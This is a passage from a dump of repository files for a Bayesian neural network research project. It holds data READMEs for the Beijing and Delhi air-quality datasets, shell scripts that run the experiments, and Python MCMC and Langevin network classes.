cut_off_date, forecast_period, list_of_lags)\ngenerate_files_for_station(146, index_column, cut_off_date, forecast_period, list_of_lags)\ngenerate_files_for_station(345, index_column, cut_off_date, forecast_period, list_of_lags)\n\n\n"
},
{
"alpha_fraction": 0.7485714554786682,
"alphanum_fraction": 0.7485714554786682,
"avg_line_length": 28,
"blob_id": "1677b58b59285fa39def296f55b22eccccb80624",
"content_id": "07365b5ea027081a62edf1ca97e1f60b1c91e868",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 6,
"path": "/analysis/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Analysis\n--------\n\nThis directory contains the scripts used to generate summary tables of the datasets.\n\nExecute [RUN.sh](RUN.sh) to regenerate the tables used in the paper.\n\n"
},
{
"alpha_fraction": 0.7407407164573669,
"alphanum_fraction": 0.7407407164573669,
"avg_line_length": 25.5,
"blob_id": "e570e29b939f7e91d1684a70c843d9264e458eba",
"content_id": "6108262b3004478d5c00b507564e8f860ba91713",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 4,
"path": "/results/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Results\n=======\n\nDummy directory so that when you run an example there is a default directory for results\n\n\n"
},
{
"alpha_fraction": 0.6829268336296082,
"alphanum_fraction": 0.6829268336296082,
"avg_line_length": 15,
"blob_id": "aa24f3bcdab727484d45a4fc071a4d3c52834152",
"content_id": "7b04147dc59525e68375d79cc6a78382de2690fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 5,
"path": "/experiments/RUN_Delhi.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n./RUN_Delhi_FFNN.sh\n./RUN_Delhi_LangevinFFNN.sh\n./RUN_Delhi_SLP.sh\n\n\n"
},
{
"alpha_fraction": 0.7301061153411865,
"alphanum_fraction": 0.7539787888526917,
"avg_line_length": 38.644737243652344,
"blob_id": "b1d665d43b3afccabee9deeda5a3f905bf263583",
"content_id": "85e5cec369945662c746d57e8ed5ea9d618fa792",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3024,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 76,
"path": "/data/Beijing/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "BeiJing PM2.5 Particulate Concentration Data\n============================================\n \nThis data contains hourly observations of pm2.5 particulate matter concentrations from the US embassy in BeiJing.\nThese are combined with various measurements of the weather conditions at the same points in time.\n\nDownloaded from [https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data](https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data)\n\n\n### Source:\n\nSong Xi Chen, csx '@' gsm.pku.edu.cn, Guanghua School of Management, Center for Statistical Science, Peking University.\n\n\n### Data Set Information:\n\nThe data time period is between Jan 1st, 2010 to Dec 31st, 2014. Missing data are denoted as NA\n\nThere are a total of 43,824 records.\n\n### Attribute Information:\n\nNo: row number \nyear: year of data in this row \nmonth: month of data in this row \nday: day of data in this row \nhour: hour of data in this row \npm2.5: PM2.5 concentration (ug/m^3) \nDEWP: Dew Point (℃) \nTEMP: Temperature (℃) \nPRES: Pressure (hPa) \ncbwd: Combined wind direction \nIws: Cumulated wind speed (m/s) \nIs: Cumulated hours of snow \nIr: Cumulated hours of rain \n\n\nRelevant Papers:\n\nLiang, X., Zou, T., Guo, B., Li, S., Zhang, H., Zhang, S., Huang, H. and Chen, S. X. (2015). Assessing Beijing's PM2.5 pollution: severity, weather impact, APEC and winter heating. Proceedings of the Royal Society A, 471, 20150257.\n\n\n\n### Processing\n\nThe file [RUN.sh](RUN.sh) will both download the data and then process it into the format reading for training.\n\nThere are a series of process files that generate each of the different forecast window datasets. These are\n\n* [process_1_hour.py](process_1_hour.py)\n* [process_24_hour.py](process_24_hour.py)\n* [process_168_hour.py](process_168_hour.py)\n\nThese files process the raw data into a predictive format suitable for treating the problem as a regression task\nin which we attempt to predict the value of pm2.5 particulate matter either 1, 24 or 168 hours in advance.\n\nIn addition we convert the field 'cbwd' into 4 indicator variables, one for each of the wind direction componenets (N,S,E,W)\n\nWe remove any rows for which the target is NULL, and we use mean value imputation for missing values in the features.\n\nWe split out the first 30,000 of the remaining rows for training and test on the remaining data.\n\nWe normalise all feature columns by subtracting the minimun value and then dividing by the different between the \nmaximum and the minimum. Rather that subtracting the mean and dividing by the standard deviation of the training data\n(mean and std of training is applied to normalise the test data)\n\n\n### Dependencies\n\nThe processing of the data into time based features requires the Dataset_Generator library.\nYou can pull the repo from here. \n\n[https://github.com/john-hawkins/Dataset_Transformers](https://github.com/john-hawkins/Dataset_Transformers)\n\nNote that the file process files import from this library assuming that it\nis another directory found in the same root directory as this project.\n\n\n\n"
},
{
"alpha_fraction": 0.7027677297592163,
"alphanum_fraction": 0.7653429508209229,
"avg_line_length": 74.45454406738281,
"blob_id": "8a9b02e5bba8565e48f2835c702abed1a29807d6",
"content_id": "3f53f0238f51765bc90cf93940594b3c7bf4caae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 831,
"license_type": "no_license",
"max_line_length": 304,
"num_lines": 11,
"path": "/experiments/RUN_BeiJing_24hr_FFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 53 20 1 0 FFNN sigmoid data/Beijing/sets/Train_24_hour_norm.csv data/Beijing/sets/Test_24_hour_norm.csv results/Beijing_FFNN_24Hr_Sigmoid/ MASE 100000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n\npython3 ./transform_test_results.py \"./results/Beijing_FFNN_24Hr_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_FFNN_24Hr_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" \"data/Beijing/sets/Target_24_nzr_config.yaml\" True False False False \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\npython3 analyse_test_results.py \"./results/Beijing_FFNN_24Hr_Sigmoid\" \"./results/Beijing_FFNN_24Hr_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" 50000 \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.48261475563049316,
"alphanum_fraction": 0.4860917925834656,
"avg_line_length": 35.24369812011719,
"blob_id": "93734c6a6bf9eaa22a44a7fd15cb23270752b632",
"content_id": "a8bf26f49aa5c18a901011835c03e6054ffb9330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4314,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 119,
"path": "/transform_test_results.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport time\nimport sys\nimport os\n\nsys.path.append('../Dataset_Transformers')\nfrom transform import Normalizer as nzr\n\n\n#################################################################################\n#\n# TRANSFORM THE RESULTS OF TEST PREDICTIONS FOR A BAYESIAN MODEL \n#\n# PARAMETERS\n# - PATH TO WRITE RESULTING TRANSFORMED FILE\n# - PATH TO TEST RESULT: THE PREDICTIONS MADE ON THE TEST DATA\n# - PATH TO TESTING DATA: PATH TO THE ORIGINAL UN-NORMALISED DATA\n# - PATH TO DE-NORMALISATION FILE: FILE CONTAINING PARAMTERS TO DE-NORMALISE TARGET PREDS\n# - IS_NORMALISED: BOOLEAN\n# - IS_DIFFERENCED: BOOLEAN\n# - IS_PROPORTIONAL: BOOLEAN\n# - ROUND: BOOLEAN\n# - TARGET_COL_NAME: COLUMN NAME OF FOR PREDICTION TARGET\n# - NAIVE_COL_NAME: FOR USE IF DIFFERENCING HAS BEEN APPLIED AND CALCULATING MASE\n#\n#################################################################################\ndef main():\n if len(sys.argv) < 10:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n result_path = sys.argv[1]\n result_file_path = sys.argv[2]\n test_data_path = sys.argv[3]\n norm_path = sys.argv[4]\n is_normalised = sys.argv[5]\n is_differenced = sys.argv[6]\n is_proportional = sys.argv[7]\n apply_round = sys.argv[8]\n target_col = sys.argv[9]\n ref_col = sys.argv[10]\n \n test_data = pd.read_csv( test_data_path, sep=\",\" )\n test_preds = np.loadtxt( result_file_path )\n nzr_config = nzr.read_normalization_config( norm_path )\n\n final_preds = test_preds\n\n if is_normalised=='True':\n final_preds = nzr.de_normalize_all( test_preds, nzr_config )\n \n if is_differenced=='True':\n final_preds = de_difference( test_data, final_preds, ref_col, target_col )\n\n if is_proportional=='True':\n final_preds = de_prop_difference( test_data, final_preds, ref_col, target_col, apply_round )\n\n write_results(final_preds, result_path)\n\n\n#################################################################################\n# USAGE\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<RESULTS DIR> <TEST PREDS FILE> <TEST DATA PATH> <DE NORM FILE>\",\n \" <IS NORMALISED> <IS DIFFERENCED> <IS PROPORTIONAL> <ROUND>\",\n \" <TARGET COL> <NAIVE COL>\"\n )\n\n\n#################################################################################\n# OPEN THE NORMALISATION CONFIG FILE\n#################################################################################\ndef load_normalisation_data(nzr_path):\n with open(nzr_path, 'r') as stream:\n lded = yaml.load(stream)\n return lded\n\n\n#################################################################################\n# DE-DIFFERENCE THE RAW PREDICTIONS\n#################################################################################\ndef de_difference( data, preds, ref_col, target_col ):\n print(\"De-Differencing from \", target_col, \" using \", ref_col)\n rez = preds.copy()\n print( \"rez\", len(rez))\n print( \"data\", len(data))\n for i in range(len(data)):\n rez[:,i] = data.iloc[i,:][ref_col] + rez[:,i]\n return rez\n\n\n#################################################################################\n# DE-PROPORTIONAL DIFFERENCE THE RAW PREDICTIONS\n#################################################################################\ndef de_prop_difference( data, preds, ref_col, target_col, apply_rounding ):\n rez = preds.copy()\n for i in range( len(data) ):\n rez[:,i] = data.iloc[i,:][ref_col] + ( rez[:,i] * data.iloc[i,:][ref_col] )\n if apply_rounding=='True':\n rez[:,i] = np.around( rez[:,i] )\n return rez\n\n\n#################################################################################\n# WRITE OUT THE TRUE VALUES AND PREDICTION INTERVALS FILE\n#################################################################################\ndef write_results( dataset, results_path ) :\n df = pd.DataFrame(dataset)\n df.to_csv(results_path, sep=\" \", index=False, header=False)\n\n\nif __name__ == \"__main__\": main()\n\n"
},
{
"alpha_fraction": 0.6191950440406799,
"alphanum_fraction": 0.6738905906677246,
"avg_line_length": 68.07142639160156,
"blob_id": "436eabb47dc4e878ae7ff5a0eb9e10ca73763246",
"content_id": "102268c444d086bf1fd66aa953b8355c94f97c99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 969,
"license_type": "no_license",
"max_line_length": 306,
"num_lines": 14,
"path": "/experiments/RUN_BeiJing_7day_SLP.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\n# BeiJing Air Quality \n \npython3 ./train_bn_mcmc.py 28 0 1 0 SLP sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_7day_SLP_Sigmoid/ MASE 100000\n\n##############################################################################################################\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_7day_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_7day_SLP_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_7day_SLP_Sigmoid\" \"./results/Beijing_7day_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 50000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n\n"
},
{
"alpha_fraction": 0.7062857151031494,
"alphanum_fraction": 0.7725714445114136,
"avg_line_length": 86.4000015258789,
"blob_id": "9668d6e380cd89cd79cd1509ae9d9740fb11b5ff",
"content_id": "ed937ef65e4b98d9f9a15cf3753db51965d9472c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 875,
"license_type": "no_license",
"max_line_length": 321,
"num_lines": 10,
"path": "/experiments/RUN_BeiJing_7day_DeepFFNN_H5.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 28 5 1 3 DeepFFNN sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_DeepFFNN_H5_7day_Sigmoid/ MASE 100000\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n\npython3 ./transform_test_results.py \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\npython3 analyse_test_results.py \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid\" \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 50000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.42060890793800354,
"alphanum_fraction": 0.4285714328289032,
"avg_line_length": 31.815383911132812,
"blob_id": "11434b9552a14bf1a0982cb1dd6428fbda3ce1b3",
"content_id": "b6ad41cb2fea1d7c6c13dba60b4dab45fce6dcc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2135,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 65,
"path": "/analysis/summarise_data.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport sys\n\n#################################################################################\ndef main():\n if len(sys.argv) < 1:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n dataset = sys.argv[1]\n\n df = pd.read_csv(dataset)\n generate_analysis(df)\n\n#################################################################################\n# USAGE\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<RESULTS DIR> <TEST PREDS FILE> <TEST DATA PATH> <DE NORM FILE>\",\n \" <IS NORMALISED> <IS DIFFERENCED> <IS PROPORTIONAL> <ROUND>\",\n \" <TARGET COL> <NAIVE COL>\"\n )\n\ndef generate_analysis(df):\n colnames = df.columns\n \n records = len(df)\n \n print(\"\\\\begin{table}[h!]\")\n print(\" \\\\begin{center}\")\n print(\" \\\\caption{Data Summary}\")\n print(\" \\\\label{tab:table1}\")\n print(\" \\\\begin{tabular}{l|l|r|r|r|r} \")\n print(\" \\\\textbf{Col Name} & \\\\textbf{Type} & \\\\textbf{Missing \\%} & \\\\textbf{Min} & \\\\textbf{Mean} & \\\\textbf{Max}\\\\\\\\\")\n print(\" \\\\hline\")\n \n for name in colnames:\n nacount = len(df[df[name].isna()])\n napercent = round(100*nacount/records,3)\n valtype = \"Char\"\n thetype = str(type(df.loc[1,name]))\n if thetype == \"<class 'numpy.float64'>\" :\n valtype = \"Real\"\n if thetype == \"<class 'numpy.int64'>\" :\n valtype = \"Int\"\n if (valtype != \"Char\") :\n themin = round(df[name].min(),3)\n themean = round(df[name].mean(),3)\n themax = round(df[name].max(),3)\n else:\n themin = \"-\"\n themean = \"-\"\n themax = \"-\"\n print(\" \", name, \"&\", valtype, \"&\", napercent, \"&\", themin, \"&\", themean, \"&\", themax, \"\\\\\\\\\")\n \n print(\" \\\\end{tabular}\")\n print(\" \\\\end{center}\")\n print(\"\\\\end{table}\")\n \n############################################### \n\nif __name__ == \"__main__\": main()\n\n\n"
},
{
"alpha_fraction": 0.7874369025230408,
"alphanum_fraction": 0.7874369025230408,
"avg_line_length": 45.81578826904297,
"blob_id": "c7ef233856c691d5ca6986e4a66cea8832877ac1",
"content_id": "38dc06d9617225dec948e63d73b9a88dffb0c1bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 38,
"path": "/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Bayesian Neural Networks\n========================\n \nThis goal of this project is to allow experimentation with different neural network structures\nand variations on the MCMC sampling procedure.\n\n[Inital code based on the MCMC FFN Project by Rohit](https://github.com/rohitash-chandra/MCMC_fnn_timeseries)\n\n\n# Usage\n\nThe [experiments](experiments) folder contains a bunch of examples of how to train and evaluate models on several\ndatasets. Note that you will need to acquire the raw data and run the processing if you want to change the nature \nof those datasets.\n\nThese scripts will execute the python command line program [train_bn_mcmc.py](train_bn_mcmc.py)\n\nIt expects to be given a training and testing data set, and it expects the data to be a CSV file\nin which the first <INPUT NODES> number of columns are the numerical input features for the model.\nAnd the final <OUTPUT NODES> number of columns contain the target values.\n\nThe value of <MODEL> determines the overall network architecture, and <DEPTH> only applies if\nit is a deep neural network. The value of <OUTPUT ACTIVATION> determines what the activation function\nwill be and you need to choose this depending on the distribution of your target value.\n\n\n# TODO\n \n* The above method of describing the neural network structure is cumbersome and inflexible. I plan to make this driven \n by a single regular expression style syntax that describes the entire architecture.\n\n# CURRENT WORK \n\nI am extracting aspects of the MCMC and Metropolis Hastings calculations that are specific to the\nneural network architecture and embedding them in the specific neural network classes. \n\nThis will make the overall MCMC class very abstract/general and I can then easily run multiple \narchitectures side-by-side for comparison.\n\n\n\n\n"
},
{
"alpha_fraction": 0.5283995866775513,
"alphanum_fraction": 0.5327430963516235,
"avg_line_length": 51.955753326416016,
"blob_id": "17a861972aba9df911830b87026f6b80e62139d7",
"content_id": "7e20fedaee63a4e88b211d39cadd2e3b35a9b2e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5986,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 113,
"path": "/src/LangevinNeuralNetwork.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport numpy as np\nimport random\nimport time\nimport math\nfrom NeuralNetwork import NeuralNetwork\n\n#-------------------------------------------------------------------------------\n# DEFINE A LANGEVIN NEURAL NETWORK BASE CLASS \n# WE EXTEND FROM THE STANDARD NEURAL NETWORK BUT CHANGE SOME OF THE MCMC FUNCTION\n# DEFINTIONS AND SIGNATURES\n#-------------------------------------------------------------------------------\nclass LangevinNeuralNetwork(NeuralNetwork):\n\n\n # THESE PARAMETERS CONTROL THE GRADIENT DESCENT PROCESS\n lrate = 0.0001;\n\n use_batch = False\n\n ######################################################################\n # CONSTRUCTOR\n ######################################################################\n def __init__(self, input, output, output_act, eval_metric):\n NeuralNetwork.__init__(self, input, output, output_act, eval_metric)\n\n\n ######################################################################\n # INITALISE THE DIAGONAL COVANRIANCE MATRIX FOR CALCULATING THE \n # PROBABILITY OF PROPOSAL TRANSITIONS - NEEDED FOR GRADIENT DESCENT\n # MCMC \n ######################################################################\n def initialise(self):\n self.w_size = self.get_weight_vector_length()\n # for Equation 9 in Ref [Chandra_ICONIP2017]\n self.sigma_diagmat = np.zeros((self.w_size, self.w_size))\n np.fill_diagonal(self.sigma_diagmat, self.step_w)\n\n\n #########################################################################################\n # CALCULATE LANGEVIN METROPOLIS HASTINGS ACCEPTANCE PROBABILITY - GRADIENT DESCENT + RANDOM WALK\n #----------------------------------------------------------------------------------------\n # THIS NEXT SECTION INVOLVES CALCULATING: Metropolis-Hastings Acceptance Probability for a model\n # with Langevin dynamics in the propsal generation process.\n # This will consist of the following components\n # 1) A ratio of the likelihoods (current and proposal)\n # 2) A ratio of the priors (current and proposal)\n # 3) The inverse ratio of the transition probabilities.\n ###########################################################################################################\n def calculate_metropolis_hastings_acceptance_probability( self, new_w, w_gd, new_tausq, old_w, old_tausq, data ):\n\n # WE FIRST NEED TO CALCULATE THE REVERSAL RATIO TO SATISFY DETAILED BALANCE\n # \n # Calculate a weight vector derived using gradient descent from the proposal\n w_prop_gd = self.langevin_gradient_update(data, new_w.copy())\n\n \n # THIS WAS THE VERSION USED IN THE SIMULATIONS FOR THE ORIGINAL PAPER\n # diff_prop = np.log(multivariate_normal.pdf(old_w, w_prop_gd, self.sigma_diagmat) - np.log(multivariate_normal.pdf(new_w, w_gd, sigma_diagmat)))\n ### UPDATE TO FIX NUMERICAL ISSUE\n wc_delta = (old_w - w_prop_gd)\n wp_delta = (new_w - w_gd )\n sigma_sq = self.step_w\n first = -0.5 * np.sum(wc_delta * wc_delta ) / sigma_sq # this is wc_delta.T * wc_delta /sigma_sq\n second = -0.5 * np.sum(wp_delta * wp_delta ) / sigma_sq\n diff_prop = first - second\n ### END UPDATE\n\n new_log_prior = self.get_log_prior( new_w, new_tausq)\n new_log_likelihood = self.get_log_likelihood(data, new_w, new_tausq)\n old_log_prior = self.get_log_prior( old_w, old_tausq)\n old_log_likelihood = self.get_log_likelihood(data, old_w, old_tausq)\n diff_likelihood = new_log_likelihood - old_log_likelihood\n diff_prior = new_log_prior - old_log_prior\n logproduct = diff_likelihood + diff_prior\n if logproduct > 709:\n logproduct = 709\n difference = math.exp(logproduct)\n mh_prob = min(1, difference)\n return mh_prob\n\n ######################################################################\n # GENERATE A PROPOSAL WEIGHT VECTOR USING GRADIENT DESCENT PLUS NOISE\n ######################################################################\n def get_proposal_weight_vector(self, data, w):\n w_gd = self.langevin_gradient_update(data, w)\n w_proposal = w_gd + np.random.normal(0, self.step_w, self.w_size)\n return w_proposal\n\n ######################################################################\n # GENERATE A PROPOSAL WEIGHT VECTOR USING GRADIENT DESCENT PLUS NOISE\n # RETURN : Tuple with the proposal and the raw gradient descent derived \n # weights\n ######################################################################\n def get_proposal_weight_vector_and_gradient(self, data, w):\n w_gd = self.langevin_gradient_update(data, w)\n w_proposal = w_gd + np.random.normal(0, self.step_w, self.w_size)\n return [w_proposal, w_gd]\n\n\n ######################################################################\n # CALCULATE EVERYTHING NEEDED FOR A SINGLE MCMC STEP\n # - PROPOSAL, PREDS, ERROR AND ACCEPTANCE PROBABILITY\n # We overwrite the definition in the Neural Network Base class because we need both the \n # proposal generation and acceptance probability to be aware of the error gradient of model.\n ###########################################################################################################\n def get_proposal_and_acceptance_probability(self, w, eta, tausq, traindata, testdata):\n [w_proposal, w_gd] = self.get_proposal_weight_vector_and_gradient(traindata, w)\n [eta_pro, tau_pro] = self.get_proposal_tau(eta)\n [pred_train, rmsetrain] = self.evaluate_proposal(traindata, w_proposal)\n [pred_test, rmsetest] = self.evaluate_proposal(testdata, w_proposal)\n mh_prob = self.calculate_metropolis_hastings_acceptance_probability(w_proposal, w_gd, tau_pro, w, tausq, traindata)\n return [w_proposal, eta_pro, tau_pro, pred_train, rmsetrain, pred_test, rmsetest, mh_prob]\n\n\n"
},
{
"alpha_fraction": 0.7484756112098694,
"alphanum_fraction": 0.7576219439506531,
"avg_line_length": 35.38888931274414,
"blob_id": "28b93f2f56abd3e37b17f10537ececfc85a58d12",
"content_id": "5e7f8353696e9d8e43e86f6d00fefcdde0702ce3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 656,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 18,
"path": "/data/Delhi/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Delhi Air Quality TIme Series\n-----------------------------\n\nThis data was was retrieved manually in June 2019 from the Indian Government website:\n\nhttps://data.gov.in/catalog/historical-daily-ambient-air-quality-data\n\nThe API was not used because it appears to require an Indian phone number to register.\nWithout registration you are restricted to 10 rows per day using a test key.\n\n\nPreparation\n-----------\n\nThere are numerous problems with the raw data, different date formats, large missing sections\nfor certain mnonitoring stattions and irregularity in the time intervals.\n\nThe first stage of preparation happens in the file [process.py](process.py)\n\n"
},
{
"alpha_fraction": 0.6990291476249695,
"alphanum_fraction": 0.7330096960067749,
"avg_line_length": 17.636363983154297,
"blob_id": "5bc0ad1de3fedad7ffbdae4a0cf2b08cefbbf4ce",
"content_id": "9fd1a1e3895bd6bad9759e9a1525fc88d3d63f2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 11,
"path": "/experiments/RUN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n./RUN_Delhi_FFNN.sh\n./RUN_Delhi_LangevinFFNN.sh\n./RUN_Delhi_SLP.sh\n\n./RUN_BeiJing_24hr_SLP.sh\n./RUN_BeiJing_24hr_FFNN.sh\n./RUN_BeiJing_24hr_LangevinFFNN.sh\n\n./RUN_BeiJing_7day_LangevinFFNN.sh\n\n"
},
{
"alpha_fraction": 0.45648854970932007,
"alphanum_fraction": 0.4637404680252075,
"avg_line_length": 45.15858840942383,
"blob_id": "e0d79dc37c6b05e1dd4b4688211eb587496e5774",
"content_id": "3312dc8a3664ef4e8eb3524c44b5d5b59d8fa401",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10480,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 227,
"path": "/src/NeuralNetwork.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport numpy as np\nimport random\nimport time\nimport math\n\n#-------------------------------------------------------------------------------\n# DEFINE A NEURAL NETWORK BASE CLASS - FOR OTHER MODELS TO EXTEND\n#-------------------------------------------------------------------------------\nclass NeuralNetwork:\n\n # THESE PARAMETERS CONTROL THE RANDOM WALK\n # THE FIRST THE CHANGES TO THE NETWORK WEIGHTS\n step_w = 0.01;\n\n # THE SECOND THE VARIATION IN THE NOISE DISTRIBUTION\n step_eta = 0.01;\n\n # THESE VALUES CONTROL THE INVERSE GAMMA FUNCTION\n # WHICH IS WHAT WE ASSUME TAU SQUARED IS DRAWN FROM\n # THIS IS CHOSEN FOR PROPERTIES THAT COMPLIMENT WITH THE GAUSSIAN LIKELIHOOD FUNCTION\n # IS THERE A REFERENCE FOR THIS?\n nu_1 = 0\n nu_2 = 0\n\n # SIGMA SQUARED IS THE ASSUMED VARIANCE OF THE PRIOR DISTRIBUTION\n # OF ALL WEIGHTS AND BIASES IN THE NEURAL NETWORK\n sigma_squared = 25\n\n ######################################################################\n # CONSTRUCTOR\n ######################################################################\n def __init__(self, input, output, output_act, eval_metric):\n self.input = input\n self.output = output\n self.output_act = output_act\n self.eval_metric = eval_metric\n\n if output_act==\"sigmoid\":\n self.activation = self.sigmoid\n elif output_act==\"tanh\":\n self.activation = self.tanh\n elif output_act==\"relu\":\n self.activation = self.relu\n else :\n self.activation = self.linear\n\n if eval_metric==\"MAE\":\n self.eval = self.mae\n elif eval_metric==\"MAPE\":\n self.eval = self.mape\n elif eval_metric==\"MASE\":\n self.eval = self.mase\n elif eval_metric==\"MASEa\":\n self.eval = self.mase\n elif eval_metric==\"MASEb\":\n self.eval = self.maseb\n else :\n self.eval = self.rmse\n\n\n ######################################################################\n # LOCAL DEFINITION OF THE SIGMOID FUNCTION FOR CONVENIENCE\n ######################################################################\n def sigmoid(self, x):\n return 1 / (1 + np.exp(-x))\n\n ######################################################################\n # LOCAL DEFINITION OF THE TANH FUNCTION FOR CONVENIENCE\n ######################################################################\n def tanh(self, xin):\n bounder = lambda t: max(-709,min(709,t))\n x = np.array([[bounder(xi) for xi in xin[0]]])\n ex = np.exp(x)\n eminx = np.exp(-x)\n return (ex - eminx)/(ex + eminx)\n\n ######################################################################\n # RELU\n ######################################################################\n def relu(self, xin):\n bounder = lambda t: max(0,t)\n x = np.array([[bounder(xi) for xi in xin[0]]])\n return x\n\n ######################################################################\n # LINEAR ACTIVATION\n ######################################################################\n def linear(self, x):\n return x \n\n ######################################################################\n # RMSE - Root Mean Squared Error\n ######################################################################\n def rmse(self, predictions, targets, features):\n return np.sqrt(((predictions - targets) ** 2).mean())\n\n ######################################################################\n # Mean Absolute Error\n ######################################################################\n def mae(self, predictions, targets, features):\n return (np.abs(predictions - targets)).mean()\n\n ######################################################################\n # Mean Absolute Percentage Error (with correction for zero target) \n ######################################################################\n def mape(self, predictions, targets, features):\n return (np.abs(predictions - targets)/(targets+0.0000001)).mean()\n\n ######################################################################\n # AUC - Area Under the Curve (Binary Classification Only)\n # TODO: Implement\n ######################################################################\n def auc(self, predictions, targets, features):\n #joined = \n #sorted = \n return (np.abs(predictions - 